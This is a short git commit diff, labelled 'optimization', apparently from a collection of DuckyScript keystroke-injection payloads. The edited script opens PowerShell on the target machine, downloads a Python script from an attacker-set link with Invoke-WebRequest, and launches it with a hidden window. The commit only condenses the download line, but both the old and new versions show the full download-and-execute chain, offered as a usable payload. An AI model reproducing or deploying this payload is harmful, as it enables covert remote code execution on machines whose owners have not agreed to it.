optimization

pull/342/head
aleff-github 2023-10-19 08:39:57 +02:00
parent 1b1b04e3d3
commit 1584ffbb15
1 changed files with 2 additions and 5 deletions

View File

@ -14,7 +14,7 @@ REM - Python
REM - Internet Connection
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
DEFINE #SCRIPT-PY-LINK example.com
DELAY 1000
@ -24,10 +24,7 @@ STRING powershell
ENTER
DELAY 500
STRING Invoke-WebRequest -Uri "
STRING SCRIPT-PY-LINK
STRING " -OutFile "script.py"
ENTER
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 500
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden